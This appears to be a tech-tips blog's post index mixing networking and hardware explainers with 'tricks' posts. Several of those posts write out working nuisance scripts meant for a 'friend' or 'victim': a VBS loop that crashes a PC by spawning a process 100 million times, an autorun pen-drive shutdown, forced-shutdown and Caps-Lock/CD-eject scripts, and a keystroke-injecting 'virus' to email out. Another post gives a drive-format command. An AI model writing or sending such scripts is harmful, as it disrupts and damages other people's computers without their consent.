Skip to main content

Posts

Difference between a network hub, switch, and router?

There are three main devices that work to connect one computer to another computer. A network hub, switch, and router can all perform this function. It can sometimes be confusing when trying to figure out what device is currently being used on a computer network, without knowing what each device does. Network Hub A network hub is designed to connect computers to each other with no real understanding of what it is transferring. Typically, a network hub is used for a private network, one that does not have any connections to sources other than local computers (meaning, no Internet access). When a hub receives a packet of data from a connected device, it broadcasts that data packet to all other connected devices regardless of which one ends up being the final destination. Additionally, network bandwidth is split between all of the connected computers. So, the more computer that are connected, the less bandwidth that is available for each computer, which means slower connection...

5 Amazing Websites That Will Blow Your Mind

1- Real-Time Hacking Attacks ↡ Click Here Norse Attack Map 2- Infinite Zoom ↡ Click Here Zoomquilt 3- Pointer Pointer ↡ Click Here Pointer Pointer 4-Quick Essay ↡ Click Here Essay Typer Draw Amazing ↡ Click Here Easy 3D Drawing

MX Player to Support AC3 Audio

        Click Here to Download AC3 audio support

How To Crash Computer With Only One Click.

Step 1 >> Open Notepad. Step 2 >> Copy This Code. Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Step 3 >> Save It As Anything.vbs Step 4 >> Run It.

How To Shutdown Computer Using Pendrive.

Step 1: >>copy this  code into notepad: @echo off shutdown -s -t 00 Save as fun.bat extension (for eg: clickme.bat). Step 2:  Now open the notepad and copy this code: [autorun] Open=filename.bat Action=Mouse Disable Save it as "autorun.inf" //don't forget to change the "filname.bat" with your filname.bat. Step 3:  Then copy the two files in your pen drive or victim's pen drive. That's all whenever the victim insert his pen drive,the system will be turned off automatically.

10 Most Dangerous Computer scripts.

NOTE: ALL THESE SCRIPTS SHOULD WRITE IN NOTE PAD ONLY THEN WORKS ELSE NOT WORK: 1) Convey your friend a little message and shut down his / her computer: Type in note pad : @echo off msg * I don''t like you shutdown -c ''Error! You are too stupid!'' -s  Save it as ''Anything.BAT'' in All Files and send it. 2) Toggle your friend''s Caps Lock button simultaneously: Type in note pad : Set wshShell =wscript.CreateObject (''WScript.Shell'') do wscript.sleep 100 wshshell.sendkeys ''{CAPSLOCK}'' loop Save it as ''Anything.VBS'' and send it. 3) Continually pop out your friend''s CD Drive. If he / she has more than one, it pops out all of them!   Type in note pad : Set oWMP = CreateObject(''WMPlayer.OCX.7'')Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item.Eject Next For i...

Use Your Photo As an ICON.

Steps 1.Open MSPAINT 2.opn any image file 3.go to "saveas"filename="anything" save as type="24bit bitmap (*.bmp,*.bid) save in: mydocument; 4.now right clk on any folder 5.goto PROPERTIES-CUSTOMIZE-CHANGEICON-BROWSE-MYDOCUMENT- "ANYTHING"then press ok.

Useful Commands for Kali Linux.

So here is a list for some of the basic commands for Kali Linux  Let's start with  details of commands 1. Command: ls The command “ls” stands for (List Directory Contents), List the contents of the folder, be it file or folder, from which it runs. The most common options are -a (all files) and -l (long or details) Tab completion is supported and may be configured with .inputrc When output to file the files are listed one per line. By default, colour is not used to distinguish types of files. That is equivalent to using --color=none. Using the --color option without the optional WHEN argument is equivalent to using --color=always. With --color=auto, color codes are output only if standard output is connected to a terminal (tty). A.Command “ls -a“, list the content of folder, including hidden files the hidden files is colored blue 2. Command: lsblk The “lsblk” stands for (List Block Devices), print block devices by their assigned name (but not RAM) on the ...

Create a real virus to hack friend's keyboard function.

This trick can hack your friend's keyboard and make him type what you say. Just follow the step:<br /> Open Notepad, copy the code given below and save the file as virus.vbs Set wshShell = wscript.CreateObject ("WScript.Shell") do   wscript.sleep 100 wshshell.sendkeys "HI I AM YOUR NAME. I HACKED YOUR COMPUTER " loop Send this file to your friends in email. When they open it, he is hacked.

How To Remove All Your Google Web History?

As most of you already know, Google keeps a tab on pretty much everything you do on a Google site, provided that you signed in on any one of these websites. Everything you do is recorded, and can be used against you in the future. Search data can reveal particularly sensitive information about you, such as facts about your location, interests, age, religious views, and so on. You can, however, choose to not be so vulnerable, and can remove all of your Google web history to protect yourself from an unforeseen eventuality. In this post, I'll show you how to remove your entire Google web history. Before we begin, please note that any data you remove will be deleted permanently. Google keeps a lot of useful information that helps you find what you're looking for faster. It gives you quick access to webpages you've visited in the past, and even lets you know in search results which pages you've visited, and when. This information can be useful if you're a power use...

How To Save Web Page To PDF File ?

In this post i will teach a simple trick or browser feature that let you convert any web page into PDF file format, which might help you to read your favorite articles offline. So lets get started. 1. Open the Google Chrome Browser on your PC or MAC 2. Then go to the web page that you want to convert as a PDF. 3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 4. Now Change the destination to “Save As PDF” and hit the save button. 5. The current web page will instantly be downloaded as a PDF document.

Useful Run Commands.

You can use Run command to open any program, file etc. Here I am summarizing most run commands for you hope this will help you. Command                         Action Calc                             Calculator ЁЯУЯ firefox                        Mozilla Firefox ЁЯМН iexplore                     Internet Explorer ЁЯМО winword                   Microsoft Word ЁЯУЭ excel                          Microsoft Excel ЁЯУД powerpnt                 Microsoft Powerpoint ЁЯЕ┐ outlook                       Microsoft Outlook ЁЯЕ╛ notepad       ...

How To Format Drive Through Command Prompt ?

Step 1: Open CMD with administrator priviledge by using Run As Administrator. Command will open in admin mode like this. Step 2: Run following command, suppose i want to format D: drive then command will be Step 3:           (format with FAT32 File System)                   format  D: /fs:fat32 /q                (format with NTFS File System)                     format  D: /fs:ntfs /q then system will ask for volume name and press y for confirmation and press enter.

How to configure PAT in CCNA ?

How to Configure CCNA Point-to-point Connection ?

How to configure CCNA static NAT ?

How to Configure CCNA Dynamic Nat ?

How Many types of Hackers ?

There are good and bad hackers. Here is a window into what they do and why: White Hat Hackers:   These are the good guys, computer security experts who specialize in penetration testing and other methodologies to ensure that a company’s information systems are secure. These IT security professionals rely on a constantly evolving arsenal of technology to battle hackers. Black Hat Hackers:  These are the bad guys, who are typically referred to as just plain hackers. The term is often used specifically for hackers who break into networks or computers, or create computer viruses. Black hat hackers continue to technologically outpace white hats. They often manage to find the path of least resistance, whether due to human error or laziness, or with a new type of attack. Hacking purists often use the term “crackers” to refer to black hat hackers. Black hats’ motivation is generally to get paid. Script Kiddies:  This is a derogatory term for black hat hackers who use ...

What is PNG image ?

Type of format Portable Network Graphics (PNG /╦Иp╔к┼Л/) is a raster graphics file format that supports lossless data compression. PNG was created as an improved, non-patented replacement for Graphics Interchange Format (GIF), and is the most widely used lossless image compression format on the Internet.

What is PDF file ?

PDF (Portable Document Format) is a file format that has captured all the elements of a printed document as an electronic image that you can view, navigate, print, or forward to someone else. PDF files are created using Adobe Acrobat , Acrobat Capture, or similar products.

What is the name of the KILL signal ?

In Unix and Unix-like operating systems, kill is a command used to send a signal to a process. By default, the message sent is the termination signal, which requests that the process exit. But kill is something of a misnomer; the signal sent may have nothing to do with process killing.

What is a Linux inode ?

An inode is an entry in inode table, containing information ( the metadata ) about a regular file and directory. An inode is a data structure on a traditional Unix-style file system such as ext3 or ext4. Inode number also called as index number , it consists following attributes.

How many bytes are necessary to store a MAC address?

The MAC address is a unique value associated with a network adapter. MAC addresses are also known as hardware addresses or physical addresses. They uniquely identify an adapter on a LAN. MAC addresses are 12-digit hexadecimal numbers (48 bits in length).

What is Debug Card ?

4 Digit Debug Card Find Motherboard Faults Diagnoses. Both ISA bus and PCI bus are suitable. Determine defects by difference sounds coding with build-in speaker. It can diagnosis the motherboard signal which show the problem of CPU, Memory, video card, etc.

What is Southbridge ?

A typical north/southbridge layout. The southbridge is one of the two chips in the core logic chipset on a personal computer (PC) motherboard, the other being the northbridge. The southbridge typically implements the slower capabilities of the motherboardin a northbridge/southbridge chipset computer architecture.

What is Northbridge ?

Northbridge is an Intel chipset that communicates with the computer processor and controls interaction with memory, the Peripheral Component Interconnect (PCI) bus, Level 2 cache, and all Accelerated Graphics Port (AGP) activities. Northbridge is one part of a two-part chipset called Northbridge/Southbridge.

What is Motherboard ?

A motherboard is one of the most essential parts of a computer system. It holds together many of the crucial components of a computer, including the central processing unit (CPU), memory and connectors for input and output devices.

What is Wi-Fi Network ?

Wi-Fi is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. A common misconception is that the term Wi-Fi is short for "wireless fidelity," however this is not the case. Wi-Fi is simply a trademarked phrase that means IEEE 802.11x.

What is Wireless Networking ?

Wireless networking is a method by which homes, telecommunications networks and enterprise (business) installations avoid the costly process of introducing cables into a building, or as a connection between various equipment locations.

What is Bluetooth ?

Bluetooth is a wireless technology standard for exchanging data over short distances (using short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz) from fixed and mobile devices, and building personal area networks (PANs).

What is Modem ?

A modem is a device or program that enables a computer to transmit data over, for example, telephone or cable lines. Computer information is stored digitally, whereas information transmitted over telephone lines is transmitted in the form of analog waves.

What is DNS server ?

A DNS server is any computer registered to join the Domain Name System. A DNS server runs special-purpose networking software, features a public IP address, and contains a database of network names and addresses for other Internet hosts.

What is MAC feltering ?

In computer networking, MAC Filtering(or GUI filtering, or layer 2 address filtering) refers to a security access control method whereby the 48-bit address assigned to each network card is used to determine access to the network.

What is Repeater ?

A repeater is a network device that retransmits a received signal with more power and to an extended geographical or topological network boundary than what would be capable with the original signal. A repeater is implemented in computer networks to expand the coverage area of the network, repropagate a weak or broken signal and or service remote nodes. Repeaters amplify the received/input signal to a higher frequency domain so that it is reusable, scalable and available. Repeaters were introduced in wired data communication networks due to the limitation of a signal in propagating over a longer distance and now are a common installation in wireless networks for expanding cell size. Repeaters are also known as signal boosters.

What is Compact Disk ?

A compact disc [sometimes spelled disk] (CD) is a small, portable, round medium made of molded polymer (close in size to the floppy disk) for electronically recording, storing, and playing back audio, video, text, and other information in digital form. Tape cartridges and CDs generally replaced the phonograph record for playing back music. At home, CDs have tended to replace the tape cartridge although the latter is still widely used in cars and portable playback devices.

What is floppy disk ?

A floppy disk is a magnetic storage medium for computer systems. The floppy disk is composed of a thin, flexible magnetic disk sealed in a square plastic carrier. In order to read and write data from a floppy disk, a computer system must have a floppy disk drive (FDD).

What is Minimum Hardware Requirements for Windows Operating systems 7, 8.1, 10 & XP ?

Processor: 1 gigahertz (GHz) or faster. RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit) Free hard disk space: 16 GB. Graphics card: Microsoft DirectX 9graphics device with WDDMdriver. Processor: 1 gigahertz (GHz) or faster. RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit) Hard disk space: 16 GB (32-bit) or 20 GB (64-bit) Graphics card: Microsoft DirectX 9 graphics device with WDDM driver. If you want to run Windows 7 on your PC, here's what it takes: 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor*1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)16 GB available hard disk space (32-bit) or 20 GB (64-bit)DirectX 9 graphics device with WDDM 1.0 or higher driver. The minimum hardware requirements for Windows XP Home Edition are: Pentium 233-megahertz (MHz) processor or faster (300 MHz is recommended)At least 64 megabytes (MB) of RAM (128 MB is recommended)At least 1.5 gigabytes (GB) of available space on the hard diskCD-ROM or DV...

What is windows PowerShell ?

A shell can be command-line based or it can include a graphical user interface (GUI). Windows PowerShellis a shell developed by Microsoft for purposes of task automation and configuration management. This powerful shell is based on the .NET framework and it includes a command-line shell and a scripting language.

What is Run Command ?

On the Microsoft Windows operating system, the Run command is used to directly open an application or document whose path is known. It functions more or less like a single-line command line interface. In the GNOME interface, the Run command is used to run applications via terminal commands.